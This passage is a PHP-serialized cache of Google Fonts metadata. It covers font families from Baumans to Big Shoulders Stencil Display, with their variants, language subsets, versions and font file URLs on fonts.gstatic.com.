yRa8oZK9I0.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:148;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Baumans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/baumans/v17/-W_-XJj9QyTd3QfpR_oyaksqY5Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:149;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Bayon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v29\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/bayon/v29/9XUrlJNmn0LPFl-pOhYEd2NJ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:150;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Be Vietnam Pro\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVNSTAyLFyeg_IDWvOJmVES_HRUBX8YYbAiah8.ttf\";s:9:\"100italic\";s:90:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVLSTAyLFyeg_IDWvOJmVES_HwyPRsSZZIneh-waA.ttf\";s:3:\"200\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HT4JF8yT7wrcwap.ttf\";s:9:\"200italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPbczRbgJdhapcUU.ttf\";s:3:\"300\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HScJ18yT7wrcwap.ttf\";s:9:\"300italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPdMwRbgJdhapcUU.ttf\";s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVPSTAyLFyeg_IDWvOJmVES_EwwD3s6ZKAi.ttf\";s:6:\"italic\";s:87:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVNSTAyLFyeg_IDWvOJmVES_HwyBX8YYbAiah8.ttf\";s:3:\"500\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HTEJl8yT7wrcwap.ttf\";s:9:\"500italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPYsxRbgJdhapcUU.ttf\";s:3:\"600\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HToIV8yT7wrcwap.ttf\";s:9:\"600italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPac2RbgJdhapcUU.ttf\";s:3:\"700\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HSMIF8yT7wrcwap.ttf\";s:9:\"700italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPcM3RbgJdhapcUU.ttf\";s:3:\"800\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HSQI18yT7wrcwap.ttf\";s:9:\"800italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPd80RbgJdhapcUU.ttf\";s:3:\"900\";s:88:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HS0Il8yT7wrcwap.ttf\";s:9:\"900italic\";s:91:\"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPfs1RbgJdhapcUU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:151;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Beau Rivage\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/beaurivage/v2/UcCi3FIgIG2bH4mMNWJUlmg3NZp8K2sL.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:152;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Bebas Neue\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/bebasneue/v9/JTUSjIg69CK48gW7PXooxW5rygbi49c.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:153;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Belgrano\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/belgrano/v18/55xvey5tM9rwKWrJZcMFirl08KDJ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:154;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Bellefair\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/bellefair/v14/kJExBuYY6AAuhiXUxG19__A2pOdvDA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:155;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Belleza\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/belleza/v17/0nkoC9_pNeMfhX4BtcbyawzruP8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:156;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Bellota\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/bellota/v16/MwQzbhXl3_qEpiwAID55kGMViblPtXs.ttf\";s:9:\"300italic\";s:77:\"http://fonts.gstatic.com/s/bellota/v16/MwQxbhXl3_qEpiwAKJBjHGEfjZtKpXulTQ.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/bellota/v16/MwQ2bhXl3_qEpiwAGJJRtGs-lbA.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/bellota/v16/MwQ0bhXl3_qEpiwAKJBbsEk7hbBWrA.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/bellota/v16/MwQzbhXl3_qEpiwAIC5-kGMViblPtXs.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/bellota/v16/MwQxbhXl3_qEpiwAKJBjDGYfjZtKpXulTQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:157;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Bellota Text\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/bellotatext/v16/0FlMVP2VnlWS4f3-UE9hHXM5VfsqfQXwQy6yxg.ttf\";s:9:\"300italic\";s:87:\"http://fonts.gstatic.com/s/bellotatext/v16/0FlOVP2VnlWS4f3-UE9hHXMx--Gmfw_0YSuixmYK.ttf\";s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/bellotatext/v16/0FlTVP2VnlWS4f3-UE9hHXMB-dMOdS7sSg.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/bellotatext/v16/0FlNVP2VnlWS4f3-UE9hHXMx-9kKVyv8Sjer.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/bellotatext/v16/0FlMVP2VnlWS4f3-UE9hHXM5RfwqfQXwQy6yxg.ttf\";s:9:\"700italic\";s:87:\"http://fonts.gstatic.com/s/bellotatext/v16/0FlOVP2VnlWS4f3-UE9hHXMx--G2eA_0YSuixmYK.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:158;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"BenchNine\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/benchnine/v16/ahcev8612zF4jxrwMosT--tRhWa8q0v8ag.ttf\";s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/benchnine/v16/ahcbv8612zF4jxrwMosrV8N1jU2gog.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/benchnine/v16/ahcev8612zF4jxrwMosT6-xRhWa8q0v8ag.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:159;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Benne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/benne/v22/L0xzDFAhn18E6Vjxlt6qTDBN.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:160;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Bentham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/bentham/v18/VdGeAZQPEpYfmHglKWw7CJaK_y4.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:161;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Berkshire Swash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/berkshireswash/v16/ptRRTi-cavZOGqCvnNJDl5m5XmNPrcQybX4pQA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:162;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Besley\";s:8:\"variants\";a:12:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";i:10;s:9:\"800italic\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":12:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fbbBSdRoFPOl8-E.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fYTBSdRoFPOl8-E.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fWjGSdRoFPOl8-E.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fVHGSdRoFPOl8-E.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fTbGSdRoFPOl8-E.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fR_GSdRoFPOl8-E.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CoZdiENGg4-E04A.ttf\";s:9:\"500italic\";s:88:\"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6Ck5diENGg4-E04A.ttf\";s:9:\"600italic\";s:88:\"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6Cf5BiENGg4-E04A.ttf\";s:9:\"700italic\";s:88:\"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CRpBiENGg4-E04A.ttf\";s:9:\"800italic\";s:88:\"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CIZBiENGg4-E04A.ttf\";s:9:\"900italic\";s:88:\"http://fonts.gstatic.com/s/besley/v12/PlIjFlO1MaNwaNG8WR2J-IiUAH-_aH6CCJBiENGg4-E04A.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:163;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Beth Ellen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/bethellen/v17/WwkbxPW2BE-3rb_JNT-qEIAiVNo5xNY.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:164;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Bevan\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/bevan/v20/4iCj6KZ0a9NXjF8aUir7tlSJ.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/bevan/v20/4iCt6KZ0a9NXjG8YWC7Zs0SJD4U.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:165;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"BhuTuka Expanded One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/bhutukaexpandedone/v2/SLXXc0jZ4WUJcClHTtv0t7IaDRsBsWRiJCyX8pg_RVH1.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:166;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Big Shoulders Display\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdY86JF46SRP4yZQ.ttf\";s:3:\"200\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdQ87JF46SRP4yZQ.ttf\";s:3:\"300\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YddE7JF46SRP4yZQ.ttf\";s:7:\"regular\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdY87JF46SRP4yZQ.ttf\";s:3:\"500\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0Ydb07JF46SRP4yZQ.ttf\";s:3:\"600\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdVE8JF46SRP4yZQ.ttf\";s:3:\"700\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdWg8JF46SRP4yZQ.ttf\";s:3:\"800\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdQ88JF46SRP4yZQ.ttf\";s:3:\"900\";s:118:\"http://fonts.gstatic.com/s/bigshouldersdisplay/v15/fC1MPZJEZG-e9gHhdI4-NBbfd2ys3SjJCx12wPgf9g-_3F0YdSY8JF46SRP4yZQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:167;O:8:\"stdClass\":8:{s:6:\"family\";s:28:\"Big Shoulders Inline Display\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0nBEnR5yPc2Huux.ttf\";s:3:\"200\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0lBE3R5yPc2Huux.ttf\";s:3:\"300\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0mfE3R5yPc2Huux.ttf\";s:7:\"regular\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0nBE3R5yPc2Huux.ttf\";s:3:\"500\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0nzE3R5yPc2Huux.ttf\";s:3:\"600\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0kfFHR5yPc2Huux.ttf\";s:3:\"700\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0kmFHR5yPc2Huux.ttf\";s:3:\"800\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0lBFHR5yPc2Huux.ttf\";s:3:\"900\";s:133:\"http://fonts.gstatic.com/s/bigshouldersinlinedisplay/v21/_LOumyfF4eSU_SCrJc9OI24U7siGvBGcZqmqV9-ZZ85CGNOFeNLxoYMPJ0loFHR5yPc2Huux.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:168;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"Big Shoulders Inline Text\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwga0yqGN7Y6Jsc8c.ttf\";s:3:\"200\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgY0y6GN7Y6Jsc8c.ttf\";s:3:\"300\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgbqy6GN7Y6Jsc8c.ttf\";s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwga0y6GN7Y6Jsc8c.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgaGy6GN7Y6Jsc8c.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgZqzKGN7Y6Jsc8c.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgZTzKGN7Y6Jsc8c.ttf\";s:3:\"800\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgY0zKGN7Y6Jsc8c.ttf\";s:3:\"900\";s:126:\"http://fonts.gstatic.com/s/bigshouldersinlinetext/v21/vm8XdQDmVECV5-vm5dJ-Tp-6WDeRjL4RV7dP8u-NMyHY74qpoNNcwgYdzKGN7Y6Jsc8c.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:169;O:8:\"stdClass\":8:{s:6:\"family\";s:29:\"Big Shoulders Stencil Display\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_O0nPKHznJucP9w.ttf\";s:3:\"200\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_u0jPKHznJucP9w.ttf\";s:3:\"300\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_ZUjPKHznJucP9w.ttf\";s:7:\"regular\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_O0jPKHznJucP9w.ttf\";s:3:\"500\";s:136:\"http://fonts.gstatic.com/s/bigshouldersstencildisplay/v21/6aeZ4LS6U6pR_bp5b_t2ugOhHWFcxSGP9ttD96KCb8xPytKb-oPRU-vkuLm_CUjPKHznJucP9w.ttf\";s:3:\"600\";s:136:\"http://fonts.gstati